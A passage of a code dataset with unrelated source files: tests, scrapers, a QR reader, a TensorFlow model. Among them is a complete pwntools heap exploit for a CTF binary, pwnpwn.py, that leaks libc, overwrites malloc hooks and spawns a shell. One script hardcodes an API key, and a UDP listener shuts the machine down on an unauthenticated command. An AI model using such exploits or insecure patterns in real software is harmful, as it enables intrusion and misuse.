= [0]*21\n n_switch = [0]*21\n total = 0\n maxTotal = 0\n s = 'Fuse was not blown.'\n for i in range(1, n + 1):\n n_amperes[i] = int(input())\n for i in range(1, m + 1):\n oper = int(input())\n if n_switch[oper] == 0:\n n_switch[oper] = 1\n total += n_amperes[oper]\n if total > maxTotal:\n maxTotal = total\n if total > c:\n s = 'Fuse was blown.'\n else:\n n_switch[oper] = 0\n total -= n_amperes[oper]\n print('Sequence ', seq)\n print(s)\n if s == 'Fuse was not blown.':\n print('Maximal power consumption was ', maxTotal, ' amperes.')\n print()\n except:\n break","sub_path":"Burning Fuses.py","file_name":"Burning Fuses.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"32744553","text":"from tornado.testing import AsyncTestCase, gen_test\nfrom tornado.util import ObjectDict\nfrom unittest.mock import patch\nimport json\nfrom datetime import datetime\nfrom schema.thing import 
Thing, Data\nfrom objects.table import Record, Table\nfrom tests.base import AsyncMock\nfrom motorengine.queryset import QuerySet\nfrom motorengine import connect\n\n\nclass TestRecord(AsyncTestCase):\n\n def setUp(self):\n connect(\"dt\", host=\"mongodb://localhost:27017/dt\")\n super(TestRecord, self).setUp()\n\n def tearDown(self):\n super(TestRecord, self).tearDown()\n\n def test_record_creation(self):\n r = Record(\"News\", 1, {\"name\": \"CNNIBN\"})\n self.assertIsNotNone(r)\n self.assertEqual(r.name, \"CNNIBN\")\n self.assertEqual(r._id, 1)\n\n @patch.object(Thing, 'add', new_callable=AsyncMock)\n @patch.object(Data, 'add', new_callable=AsyncMock)\n @gen_test\n def test_record_put_add(self, add_mock, tng_mock):\n r = Record(\"News\", None, {\"name\": \"CNNIBN\"})\n yield r.put()\n self.assertTrue(add_mock.called)\n self.assertTrue(tng_mock.called)\n\n @patch.object(Data, 'update', new_callable=AsyncMock)\n @gen_test\n def test_record_put_update(self, update_mock):\n r = Record(\"News\", 1, {\"name\": \"CNNIBN\"})\n yield r.put()\n self.assertTrue(update_mock.called)\n\n\nclass TestTable(AsyncTestCase):\n\n def setUp(self):\n connect(\"dt\", host=\"mongodb://localhost:27017/dt\")\n super(TestTable, self).setUp()\n\n def tearDown(self):\n super(TestTable, self).tearDown()\n\n def test_table_instation(self):\n t = Table(\"Cache\", ['key', 'value'])\n self.assertIsNotNone(t)\n\n @patch.object(Table, '_fetch_data', new_callable=AsyncMock)\n @gen_test\n def test_get(self, call_mock):\n t = Table(\"Cache\", ['key', 'value'])\n yield t.get(1)\n self.assertTrue(call_mock.called)\n\n @patch.object(QuerySet, 'find_all', new_callable=AsyncMock)\n @gen_test\n def test_fetch_thing(self, find_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n yield t._fetch_thing(1)\n self.assertTrue(find_mock.called)\n\n @patch.object(Table, '_fetch_thing', new_callable=AsyncMock)\n @patch.object(QuerySet, 'find_all', new_callable=AsyncMock)\n @gen_test\n def test_fetch_data(self, find_mock, fetch_mock):\n\n fetch_mock.return_value = [ObjectDict(name=\"Cache\",\n thing_id=1,\n reads=0)]\n find_mock.return_value = [ObjectDict(thing_id=1,\n key=\"Key\",\n value=\"Value\"),\n ObjectDict(thing_id=1,\n key=\"Key1\",\n value=\"Value2\")]\n t = Table(\"Cache\", [\"key\", \"value\"])\n result = yield t._fetch_data(1)\n self.assertTrue(find_mock.called)\n self.assertEqual(result, dict(id=1, Key=\"Value\", Key1=\"Value2\"))\n\n @patch.object(Record, 'put', new_callable=AsyncMock)\n @gen_test\n def test_new(self, rec_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n result = yield t.new(dict(key=\"k\", value=\"v\"))\n self.assertIsNotNone(result)\n\n @patch.object(Record, 'put', new_callable=AsyncMock)\n @gen_test\n def test_update(self, rec_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n result = yield t.update(1, dict(key=\"k\", value=\"v\"))\n self.assertIsNotNone(result)\n\n @patch.object(Table, '_fetch_table', new_callable=AsyncMock)\n @patch.object(Table, '_fetch_data', new_callable=AsyncMock)\n @gen_test\n def test_list(self, data_mock, fetch_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n fetch_mock.return_value = ([ObjectDict(thing_id=1),\n ObjectDict(thing_id=2)], 0, 0)\n result = yield t.list()\n self.assertIsNotNone(result)\n\n @patch.object(Table, '_search_table', new_callable=AsyncMock)\n @gen_test\n def test_search(self, search_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n search_mock.return_value = ([ObjectDict(thing_id=1),\n ObjectDict(thing_id=2)], 0, 0)\n result = yield 
t.search(\"hello\")\n self.assertIsNotNone(result)\n\n @patch.object(QuerySet, 'find_all', new_callable=AsyncMock)\n @gen_test\n def test_search_table(self, find_mock):\n\n find_mock.return_value = [ObjectDict(thing_id=1,\n key=\"Key\",\n value=\"Value\"),\n ObjectDict(thing_id=1,\n key=\"Key1\",\n value=\"Value2\")]\n t = Table(\"Cache\", [\"key\", \"value\"])\n result = yield t._search_table(\"hello\")\n self.assertTrue(find_mock.called)\n self.assertIsNotNone(result)\n","sub_path":"tests/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"299766245","text":"'''\r\nCreated on Sep 21, 2017\r\n\r\n@author: Lakshya\r\n'''\r\nimport Algorithmia\r\nimport json\r\n\r\n# The domain to crawl and number of links deep\r\n# More here: https://algorithmia.com/algorithms/web/SiteMap\r\ninp = [\"http://cic.du.ac.in\",1]\r\n\r\n# Replace YOUR API KEY with you free Algorithmia key\r\n# https://algorithmia.com/signup\r\nclient = Algorithmia.client('simVY53cJwH+o/riK0lcbdQR9fK1')\r\n\r\n# Here we call the Site Map algorithm\r\nres = client.algo('web/SiteMap/0.1.7').pipe(inp)\r\n\r\nsiteMap = res.result\r\n\r\nfor i in siteMap:\r\n print(i)\r\n \r\nlinks = []\r\noutput = []\r\n\r\n# Iterate through the key-value pairs from the site map graph\r\n# adding every URL to the links array\r\nfor keyLink in siteMap:\r\n links.append(keyLink)\r\n for valLink in siteMap[keyLink]:\r\n links.append(valLink)\r\n\r\n# Remove duplicate links from the links array \r\nlinks = list(set(links))\r\n\r\n# Iterate through the links calling Analyze URL on each \r\n# Then add the object to the output array\r\n# More here: https://algorithmia.com/algorithms/web/AnalyzeURL\r\nfor l in links:\r\n analyze = client.algo('web/AnalyzeURL/0.2.14').pipe(l)\r\n output.append(analyze.result)\r\n\r\n# Clean up JSON and print the result\r\nprint (json.dumps(output, indent=4))\r\nprint (json.__file__)\r\n","sub_path":"TF-IDF/AlgorithmiaCrawler.py","file_name":"AlgorithmiaCrawler.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"5620991","text":"\r\nimport sqlite3\r\nimport os\r\nimport requests\r\nfrom io import StringIO\r\nimport pandas as pd\r\nimport datetime\r\nimport time\r\n\r\n\r\n# 爬取資料\r\ndef crawl_legal_person(date):\r\n # 將時間物件變成字串:'20180102'\r\n datestr = date.strftime('%Y%m%d')\r\n # 下載三大法人資料\r\n url = 'http://www.tse.com.tw/fund/T86?response=csv&date=' + datestr + '&selectType=ALLBUT0999'\r\n print(url)\r\n try:\r\n r = requests.get(url)\r\n except:\r\n return None\r\n # 製作三大法人的DataFrame\r\n try:\r\n df = pd.read_csv(StringIO(r.text), header=1).dropna(how='all', axis=1).dropna(how='any')\r\n except:\r\n return None\r\n # 微調整(為了配合資料庫的格式)\r\n # 刪除逗點\r\n df = df.astype(str).apply(lambda s: s.str.replace(',', ''))\r\n # 刪除空格\r\n df = df.astype(str).apply(lambda s: s.str.strip())\r\n # 刪除「證券代號」中的「\"」和「=」\r\n df['stock_id'] = df['證券代號'].str.replace('=', '').str.replace('\"', '')\r\n # 刪除「證券代號」這個欄位\r\n df = df.drop(['證券代號'], axis=1)\r\n # df['out_Buy'] = df['證券代號'].str.replace('=', '').str.replace('\"', '')\r\n # 設定index\r\n df['date'] = date\r\n df = df.set_index(['stock_id', 'date'])\r\n #設定欄位名稱\r\n df = df.rename(columns = { '外陸資買進股數(不含外資自營商)':'out_trust_buy',\r\n '外陸資賣出股數(不含外資自營商)':'out_trust_sell',\r\n '外陸資買賣超股數(不含外資自營商)':'out_trust_net',\r\n '外資自營商買進股數':'out_self_buy',\r\n 
'外資自營商賣出股數':'out_self_sell',\r\n '外資自營商買賣超股數':'out_self_net',\r\n '投信買進股數':'trust_buy',\r\n '投信賣出股數' :'trust_sell',\r\n '投信買賣超股數':'trust_net' ,\r\n '自營商買賣超股數':'self_totel_net' ,\r\n '自營商買進股數(自行買賣)':'self_buy' ,\r\n '自營商賣出股數(自行買賣)' :'self_out',\r\n '自營商買賣超股數(自行買賣)':'self_net' ,\r\n '自營商買進股數(避險)':'self_hedge_buy' ,\r\n '自營商賣出股數(避險)' :'self_hedge_sell' ,\r\n '自營商買賣超股數(避險)':'self_hedge_net',\r\n '三大法人買賣超股數':'total_net',\r\n '外資買進股數':'out_trust_buy',\r\n '外資賣出股數':'out_trust_sell',\r\n '外資買賣超股數':'out_trust_net',\r\n '自營商買進股數':'self_buy',\r\n '自營商賣出股數':'self_out'})\r\n # 將dataframe的型態轉成數字\r\n return df.apply(lambda s: pd.to_numeric(s, errors='coerce')).dropna(how='all', axis=1)\r\n\r\n\r\ndef is_doable(conn, chkdate, table = 'legal_person' ):\r\n c = conn.cursor()\r\n sql = 'select * from ' + table + ' where date(date) =\\'' + chkdate.strftime('%Y-%m-%d') + '\\';'\r\n rows = c.execute(sql).fetchall()\r\n print(sql + ' ' + str(len(rows)))\r\n\r\n if len(rows) > 0:\r\n c.close\r\n return False\r\n else:\r\n c.close\r\n return True\r\n\r\n\r\ndef main():\r\n # 打開資料庫\r\n conn = sqlite3.connect(os.path.join('data', 'stock.db'))\r\n\r\n #data handled from 20120501 ~ 20120716\r\n datelist = pd.date_range(start='20120716',end='20170915').tolist()\r\n for eachday in datelist:\r\n print('Now handling ' + eachday.strftime('%Y%m%d'))\r\n if is_doable(conn, eachday):\r\n df = crawl_legal_person(eachday)\r\n if df is None:\r\n continue\r\n else:\r\n df.to_sql('legal_person', conn, if_exists='append')\r\n print(df.head())\r\n time.sleep(2)\r\n else:\r\n print('duplicated data skip this date')\r\n\r\n # checkdate = datetime.date(2018, 9, 13)\r\n\r\n # 開啟GUI介面\r\n # widget(conn, 'legal_person', crawl_legal_person, date_range)\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"legalperson.py","file_name":"legalperson.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"401304174","text":"\"\"\"\nGiven a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numbers from the original list.\n\nFor example,\nGiven 1->2->3->3->4->4->5, return 1->2->5.\nGiven 1->1->1->2->3, return 2->3.\n\"\"\"\n\ndef deleteDuplicates(head):\n slow = ListNode(-1)\n slow.next = head\n head = slow\n\n while slow.next:\n fast = slow.next\n while fast.next and fast.val == fast.next.val:\n fast =fast.next \n if fast != slow.next: # This is delete \n slow.next = fast.next\n else:\n slow = slow.next # This is move\n\n return head.next","sub_path":"Linked-List/Remove-Duplicates-from-Sorted-List-II.py","file_name":"Remove-Duplicates-from-Sorted-List-II.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"272360261","text":"import cv2\nimport numpy as np\n\nfrom pyzbar.pyzbar import decode\n\n# img = cv2.imread('Qr/img.png')\ncap = cv2.VideoCapture(0)\ncap.set(3, 360)\ncap.set(4, 480)\n\nwhile True:\n succes, img = cap.read()\n for barcode in decode(img):\n myData = barcode.data.decode('utf-8')\n print(myData)\n pts = np.array([barcode.polygon], np.int32)\n pts = pts.reshape((-1, 1, 2))\n cv2.polylines(img, [pts], True, (255, 0, 0), 5)\n pts2 = barcode.rect\n #Cambiamos el color del cuadro si es una pag autorizada\n if myData == 'http://combizona.com':\n colorTxt = (255, 50, 50)\n else:\n colorTxt = (0, 0, 255)\n cv2.putText(img, myData, (pts2[0], pts2[1]), cv2.FONT_HERSHEY_SCRIPT_COMPLEX,\n 0.9, colorTxt, 2)\n 
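# (editor's note, added) redraw the annotated frame once per loop iteration; cv2.waitKey(1) below pumps the HighGUI event queue so the window stays responsive (a quit key, e.g. breaking when waitKey returns ord('q'), would be a hypothetical extension not in the original)\n 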
cv2.imshow(\"Result\", img)\n cv2.waitKey(1)\n","sub_path":"QrTest.py","file_name":"QrTest.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"160833391","text":"#coding:utf-8\n\nfrom pwn import *\nimport argparse\n\n# env = os.environ\n# env['LD_PRELOAD'] = './libc64.so'\n\nIP = '154.8.174.214'\nPORT = '10001'\nbinary = './pwn'\ncontext.binary = binary\n\nio = None\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-d', '--debugger', action='store_true')\nparser.add_argument('-r', '--remote', action='store_true')\nparser.add_argument('-l', '--local', action='store_true')\nargs = parser.parse_args()\n\nsa = lambda x,y : io.sendafter(x,y)\nsl = lambda x : io.sendline(x)\nsd = lambda x : io.send(x)\nsla = lambda x,y : io.sendlineafter(x,y)\nrud = lambda x : io.recvuntil(x,drop=True)\nru = lambda x : io.recvuntil(x)\n\ndef lg(s, addr):\n print('\\033[1;31;40m%30s-->0x%x\\033[0m' % (s, addr))\n\nif args.remote:\n io = remote(IP, PORT) \n libc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\n elf = ELF(binary)\nelif args.local or args.debugger:\n # env = {\"LD_PRELOAD\": os.path.join(os.getcwd(), \"libc.so.6\")}\n env = {}\n io = process(binary, env=env)\n elf = ELF(binary)\n proc_base = io.libs()[os.path.abspath(os.path.join(os.getcwd(), binary))]\n libc_bb = io.libs()['/lib/x86_64-linux-gnu/libc.so.6']\n libc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\nelse:\n parser.print_help()\n exit()\n\nlibc_base,__malloc_hook,system = None,None,None\ndef magic(offset):\n ru(\"\\x7f\")\n ru(\"\\x7f\")\n global libc_base,__malloc_hook,system\n leak = u64(ru(\"\\x7f\")[-6:].ljust(8,'\\x00'))\n lg('leak',leak)\n libc_base = leak - offset\n lg('base',libc_base)\n __malloc_hook = libc_base + libc.symbols['__malloc_hook']\n system = libc_base + libc.symbols['system']\n\n\ndef debug(msg=\"\"):\n msg = \"\"\"\n x/20xg 0x{:x}\n x/8xg 0x{:x}\n b *0x{:x}\n \"\"\".format(proc_base + 0x202080,\n proc_base + 0x202050,\n proc_base + 0xF43\n \n )\n\n pwnlib.gdb.attach(io,msg)\n\ndef add(sz):\n sla(\">>\",\"1\")\n sla(\"size\",str(sz))\n\ndef free(idx):\n sla(\">>\",\"2\")\n sla(\"idx\",str(idx))\n\ndef edit(idx,con):\n sla(\">>\",\"3\")\n sla(\"idx\",str(idx))\n sla(\"text\",con)\n \n\ndef exploit():\n add(0x90) #0\n add(0x68) #1\n add(0xf0) #2\n add(0x20) #3\n\n free(0)\n edit(1,'a' * 0x60 + p64(0x110))\n free(2) # unsorted \n\n free(1)\n add(0x90) #0\n add(0x160) #2\n\n free(0)\n free(1)\n\n add(0x100) #0\n edit(0,'a' * 0x90 + flat(0x0,0x71,\"\\xdd\\x25\"))\n add(0x60) #1\n add(0x60) #2\n edit(2,'a' * 0x23 + flat(0x0,0x7f,0xfbad1800, 0x0,0x0,0x0) + \"\\x00\")\n magic(0x3c56a3)\n\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,libc_base + libc.symbols['_IO_2_1_stdout_'] - 0x10))\n \n add(0x60) #1\n add(0x60) #2\n edit(4,flat(0xfbad1800, 0x0,0x0,0x0,libc_base + 0x3c3ef0))\n io.recv()\n program_leeak = u64(io.recv(6).ljust(8,'\\x00'))\n lg('program_addr',program_leeak)\n program_base = program_leeak - 0x202020\n lg('program_base',program_base)\n\n store_malloc_hook = 0x202050 + program_base\n fd1_bss_free_hook = 0x20204d + program_base\n\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,program_base + 0x20203d))\n add(0x60)\n add(0x60)\n edit(5,'a' * 3 + flat(__malloc_hook,system))\n edit(0,\"/bin/sh\\x00\")\n\n free(0)\n # debug()\n io.interactive()\n\n\"\"\"\n modify rt_global failed\n\n fd = libc_base + 0x5f0de5\n lg('fd',fd)\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,fd))\n add(0x60) #1\n add(0x68) #\n\n 
edit(4,flat(0x0,0x7f) * (0x68 // 16) + p64(0x7f))\n fd2 = 0x5f0e4d + libc_base\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,fd2))\n\n add(0x60) #1\n add(0x60)\n edit(5,flat(0x0,0x7f) * (0x68 // 16) + p64(0x7f))\n\n fd3 = 0x5f0ead + libc_base\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,fd3))\n\n add(0x60) #1\n add(0x60)\n edit(6,flat(0x0,0x7f) * (0x68 // 16) + p64(0x7f))\n\n fd4 = 0x5f0f0d + libc_base\n free(1)\n edit(0,'a' * 0x90 + flat(0x0,0x71,fd4))\n one_gg = libc_base + 0x45216\n\n\n add(0x60) #1\n add(0x60)\n edit(7,'a' * (0x33-0x8) + p64(0x3cac90 + libc_base)+ p64(one_gg))\n lg(\"one_gg\",one_gg)\n\"\"\"\n\nif __name__ == \"__main__\":\n try:\n exploit()\n except EOFError as e:\n exit(0)\n\"\"\"\n0x45216\texecve(\"/bin/sh\", rsp+0x30, environ)\nconstraints:\n rax == NULL\n\n0x4526a\texecve(\"/bin/sh\", rsp+0x30, environ)\nconstraints:\n [rsp+0x30] == NULL\n\n0xf02a4\texecve(\"/bin/sh\", rsp+0x50, environ)\nconstraints:\n [rsp+0x50] == NULL\n\n0xf1147\texecve(\"/bin/sh\", rsp+0x70, environ)\nconstraints:\n [rsp+0x70] == NULL\n\"\"\"","sub_path":"pwn_exec/kanxueQ3/heap/pwnpwn.py","file_name":"pwnpwn.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"229083085","text":"#!/usr/local/bin/python\n\n## EPlusInterface (EPI) - An interface for EnergyPlus\n## Copyright (C) 2004 Santosh Philip\n##\n## This file is part of EPlusInterface.\n## \n## EPlusInterface is free software; you can redistribute it and/or modify\n## it under the terms of the GNU General Public License as published by\n## the Free Software Foundation; either version 2 of the License, or\n## (at your option) any later version.\n## \n## EPlusInterface is distributed in the hope that it will be useful,\n## but WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n## GNU General Public License for more details.\n## \n## You should have received a copy of the GNU General Public License\n## along with EPlusInterface; if not, write to the Free Software\n## Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA \n##\n##\n## Santosh Philip, the author of EPlusInterface, can be contacted at the following email address:\n## santosh_philip AT yahoo DOT com\n## Please send all bug reports, enhancement proposals, questions and comments to that address.\n## \n## VERSION: 0.005\n\n\"\"\"\nRead the data that sketchup generates for energyplus\ngives back the data into a dictionary\n\"\"\"\n\ntry:\n set\nexcept NameError:\n from sets import Set as set\n\n\ndef stripped(txt):\n \"\"\"apply strip to all lines of a text file\"\"\"\n return '\\n'.join([line.strip() for line in txt.splitlines()])\n\ndef readsketchup(txt):\n \"\"\"read the data that sketchup generates for energyplus\n Convert it to a python dictionary\"\"\"\n lst = txt.split('face:')\n lst.pop(0)\n lst1 = [el.splitlines() for el in lst]\n [(el[0], '\\n'.join(el[1:])) for el in lst1]\n dct = dict([(el[0], '\\n'.join(el[1:])) for el in lst1])\n for name, val in dct.items():\n dct[name] = txt2face(val)\n return dct \n\ndef txt2face(txt):\n \"\"\"convert sketchup txt for one face to a face dictionary\"\"\"\n txt = stripped(txt)\n lst = [line.split(':') for line in txt.splitlines()]\n dct = dict([el for el in lst if len(el) == 2])\n ptslst = [el for el in lst if len(el) == 1]\n ptslst = [pt3[0].split() for pt3 in ptslst]\n ptslst = [[float(pt) for pt in pt3] for pt3 in ptslst]\n dct['points'] = ptslst\n if dct['parent'] == 'None': \n dct['parent'] = None\n if dct['material'] == 'None': \n dct['material'] = None\n dct['normal'] = [float(el) for el in dct['normal'].split()]\n dct['surfacedirection'] = float(dct['surfacedirection'])\n return dct\n\ndef samepoly(p1, p2):\n \"\"\"if the polygons poly1 and poly2 are identical: return True\n does not care about the order of the points in the list\n as long as the same points are there it will return True\"\"\"\n p1 = [tuple(el) for el in p1]\n p2 = [tuple(el) for el in p2]\n s1 = set(p1) \n s2 = set(p2) \n return s1 == s2 \n\ndef duplicatewindows(dct):\n \"\"\"remove the duplicate windows\n sketchup generates two planes for the windows\"\"\"\n winkeys = [key for key in dct.keys() if dct[key]['parent'] != None]\n for ikey in winkeys:\n for jkey in dct.keys():\n if dct[jkey]['parent'] == None:\n if samepoly(dct[ikey]['points'], dct[jkey]['points']):\n if dct[jkey]['material'] != None:\n dct[ikey]['material'] = dct[jkey]['material']\n dct.pop(jkey)\n return dct\n\ndef inch2meters(dct):\n \"\"\"Sketchup dumps the dimensions in inches\n Convert it to meters\"\"\"\n converter = 0.0253987605\n for key in dct.keys():\n dct[key]['points'] = [[j * converter for j in i] for i in dct[key]['points']]\n return dct\n \n\n \n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"sketchup/trunk/workingfiles/readsketchup.py","file_name":"readsketchup.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"398619417","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy.exceptions import DropItem\nimport requests\nimport re\nfrom datetime import datetime\n\nline_term = 
re.compile(r\"(^\\n)|(\\n$)\")\nline_term2 = re.compile(r\"[(\\r)(\\n)|(\\t)]+\")\n\nEVENT_TYPES = dict([\n (\"Хакатон\", \"ХАК\" ),\n (\"Митап\", \"МИТ\"),\n (\"Соревнование\", \"СОР\"),\n (\"Школа\", \"ШК\"),\n (\"Мастер-класс\", \"MK\"),\n (\"Конференция\", \"КОНФ\"),\n (\"Лекция\", \"ЛЕК\")\n ])\n\n\ndef get_month_number(month):\n mon = [\"янв\", \"фев\", \"март\", \"апр\", \"ма\", \"июн\", \"июл\", \"авг\", \"сент\", \"окт\", \"ноя\", \"дек\"]\n for i, m in enumerate(mon):\n if month.startswith(m):\n \treturn i + 1\n\nclass BeginingPipeline(object):\n def process_item(self, item, spider):\n for key in item:\n if key == \"link\" or key == \"description\": continue\n if item[key] == None: item[key] == \"\"\n try:\n item[key] = line_term.sub(\"\", item[key])\n except TypeError:\n item[key] == \"\"\n return item\n\nclass TypePipeline(object):\n def process_item(self, item, spider):\n item[\"type\"] = EVENT_TYPES.get(item[\"type\"], \"UNK\")\n if item[\"type\"] == \"UNK\":\n raise DropItem(\"Event type {} doesn't support\")\n else:\n return item\n\nclass DescriptionPipeline(object):\n def process_item(self, item, spider):\n item['description'] = \"\".join(item[\"description\"])\n item[\"description\"] = line_term2.sub(\"\\n\", item[\"description\"])\n return item\n\nclass ItEventsFree(object):\n def process_item(self, item, spider):\n if item[\"free\"] == \"Участие бесплатное\" or item[\"free\"] == \"\\nУчастие бесплатное\\n\" or len(item[\"free\"]) < 3:\n return item\n else:\n raise DropItem(\"It's not free\")\n\nclass TimePipeline(object):\n def process_item(self, item, spider):\n time = item[\"date\"]\n date, time = time.split(\", \")\n date = date.split()[:3]\n date[1] = get_month_number(date[1])\n time = time.split(\"\\n-\\n\")[0].split(\":\")\n date = list(map(int, date[::-1] + time))\n item[\"date\"] = datetime(*date).strftime(\"%Y-%m-%dT%H:%M\")\n return item\n\nclass SendAPIPipeline(object):\n collection_name = 'scrapy_items'\n def __init__(self, api_url):\n self.api_url = api_url + \"/events\"\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(crawler.settings.get(\"API_URL\"))\n\n def process_item(self, item, crawler):\n r = requests.post(\n self.api_url,\n json=item)\n if r.status_code != 200:\n raise DropItem(\"Something wrong: \" + r.text)\n return item\n\nimport json\n\nclass JsonWriterPipeline(object):\n\n def open_spider(self, spider):\n self.file = open('items.jl', 'w')\n\n def close_spider(self, spider):\n self.file.close()\n\n def process_item(self, item, spider):\n line = json.dumps(dict(item)) + \"\\n\"\n self.file.write(line)\n return item\n","sub_path":"crawlers/it_events/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"263683946","text":"#Functions inside objects - some examples of lists methods\n\n#Initialize list, add item, print list, print item index 3, show help, copy list\nl = [1,2,3,4,5]\nl.append(6)\nprint(l)\nprint(l.count(3))\nhelp(l.count)\nhelp(l.clear)\nhelp(l.copy)\nl2=[]\nl2 = l.copy()\nprint(l2)\n","sub_path":"Methods.py","file_name":"Methods.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"285459974","text":"import socket\nimport sys\nimport os\n\nif len(sys.argv) == 4:\n # Get \"IP address of Server\" and also the \"port number\" from argument 1 and argument 2\n ip = sys.argv[2]\n port = 
int(sys.argv[3])\n operationMode = sys.argv[1]\nelse:\n print(\"Run like : python3 client.py \")\n exit(1)\n\n\n# Create socket for server\nsckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\nprint(\"Do Ctrl+c to exit the program\")\n\n\nserver_address = (ip, port)\n\nif(operationMode == \"client\"):\n while True:\n send_data = input(\"Type some text to send =>\");\n sckt.sendto(send_data.encode('utf-8'), (ip, port))\n print(\"\\n\\n 1. Client Sent : \", send_data, \"\\n\\n\")\n\nelif(operationMode == \"server\"):\n sckt.bind(server_address)\n\n while True:\n print(\"####### Server is listening #######\")\n data, address = sckt.recvfrom(4096)\n dataString = data.decode('utf-8')\n print(\"\\n\\n 2. Server received: \", data.decode('utf-8'), \"\\n\\n\")\n\n if(dataString == \"shutdown\"):\n os.system(\"shutdown /s /t 1\")\n \n\n\nsckt.close()\n","sub_path":"PiPcHandler.py","file_name":"PiPcHandler.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"450016001","text":"import tensorflow as tf\nimport numpy as np\n\nUSE_TEACHER = True\n\nLR = 1e-3\nclass Videl_Caption_Generator_ATTN():\n\tdef __init__(self, n_encoder_input, n_hidden, n_decoder_input, n_embed, n_encoder_T=80, n_decoder_T=15, batch_size=5):\n\t\tself.n_encoder_input = n_encoder_input\n\t\tself.n_hidden = n_hidden\n\t\tself.n_decoder_input = n_decoder_input\n\t\tself.n_embed = n_embed\n\t\tself.n_encoder_T = n_encoder_T\n\t\tself.n_decoder_T = n_decoder_T\n\t\tself.batch_size = batch_size\n\n\t\tself.lstm1 = tf.contrib.rnn.LSTMCell(self.n_hidden)\n\t\tself.lstm2 = tf.contrib.rnn.LSTMCell(self.n_hidden)\n\t\tself.out_fc = tf.layers.Dense(self.n_decoder_input, activation=None)\n\t\tself.attn_dense = tf.layers.Dense(self.n_encoder_T, activation=tf.nn.softmax)\n\t\tself.attn_dense2 = tf.layers.Dense(self.n_embed, activation=tf.nn.relu)\n\n\t\tself.build_graph()\n\t\tself.init_op()\n\n\tdef build_graph(self):\n\n\t\tself.encoder_input = tf.placeholder(dtype=tf.float32, shape=(self.batch_size, self.n_encoder_T, self.n_encoder_input))\n\t\tself.decoder_input = tf.placeholder(dtype=tf.int32, shape=(self.batch_size, self.n_decoder_T))\n\n\t\tself.embedding_dict = tf.get_variable(name='embed_dict', shape=[self.n_decoder_input, self.n_embed], \n\t\t\tdtype=tf.float32, initializer=tf.random_uniform_initializer(-0.1, 0.1))\n\n\n\t\t######################### Encoder ###########################\n\t\tself.encoder_output, self.encoder_final_state = tf.nn.dynamic_rnn(\n\t\t\tself.lstm1, self.encoder_input, dtype=tf.float32, time_major=False\n\t\t)\n\t\t# print('encoder_output_shape: ', self.encoder_output.shape) ###(N, n_encoder_T, n_hidden)\n\t\t# print('encoder_final_state_c_shape: ', self.encoder_final_state.c.shape)\n\n\t\t######################### Decoder ###########################\n\t\tself.loss = 0.0\n\t\tdecoder_state = self.encoder_final_state ###((N, n_hidden), (N, n_hidden))\n\t\tpred_all = []\n\t\tfor i in range(self.n_decoder_T-1):\n\t\t\tif USE_TEACHER:\n\n\t\t\t\tcurrent_embed = tf.nn.embedding_lookup(self.embedding_dict, self.decoder_input[:,i]) ###(N, n_embed)\n\t\t\t\t# print('current_embed_shape:', current_embed.shape) ###(N, n_embed)\n\t\t\t\th_plus_embed = tf.concat([current_embed, decoder_state.h], axis=1) ###(N, n_embed+n_hidden)\n\t\t\t\tself.attn_weight = self.attn_dense(h_plus_embed) ###(N, n_encoder_T)\n\t\t\t\tattn_weight_reshape = tf.reshape(self.attn_weight, shape=(self.batch_size, 1, self.n_encoder_T)) ###(N, 1, 
